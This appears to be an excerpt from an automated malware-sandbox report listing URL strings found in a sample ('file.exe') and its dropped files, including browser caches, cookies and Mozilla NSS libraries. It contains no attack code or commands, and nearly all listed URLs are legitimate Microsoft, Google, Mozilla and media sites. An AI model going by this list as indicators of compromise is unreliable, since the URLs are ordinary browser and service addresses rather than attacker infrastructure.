Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log4.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr, HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log4.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: chromecache_569.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_569.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_569.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_569.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://gaana.com/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://m.kugou.com/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://m.soundcloud.com/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://m.vk.com/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: Cookies.13.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.13.dr	String found in binary or memory: https://msn.comXIDv10
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://music.amazon.com
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://music.apple.com
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log3.12.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log8.12.dr	String found in binary or memory: https://ntp.msn.com/
Source: 000003.log8.12.dr	String found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.12.dr	String found in binary or memory: https://ntp.msn.com/_default
Source: 2cc80dabc69f58b6_1.12.dr, 000003.log8.12.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 000003.log8.12.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13376815773984991.12.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager.12.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.12.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://open.spotify.com
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_569.8.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://srtb.msn.com/
Source: KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://tidal.com/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://vibe.naver.com/today
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://web.telegram.org/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://web.whatsapp.com
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: file.exe, 00000000.00000002.2687486247.00000000233F3000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.deezer.com/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, JJEGCBGI.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: content.js.12.dr, content_new.js.12.dr	String found in binary or memory: https://www.google.com/chrome
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 74628cf2-426f-44c9-9415-16f2cf6683fe.tmp.13.dr	String found in binary or memory: https://www.googleapis.com
Source: chromecache_569.8.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_569.8.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_569.8.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.instagram.com
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.last.fm/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.messenger.com
Source: KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	String found in binary or memory: https://www.mozilla.org
Source: KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: file.exe, 00000000.00000002.2662760280.0000000000FB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000002.2662760280.0000000000FB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2662760280.0000000001097000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2662760280.0000000000FB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2662760280.0000000001097000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.office.com
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: file.exe, 00000000.00000002.2687486247.00000000233F3000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.tiktok.com/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://www.youtube.com
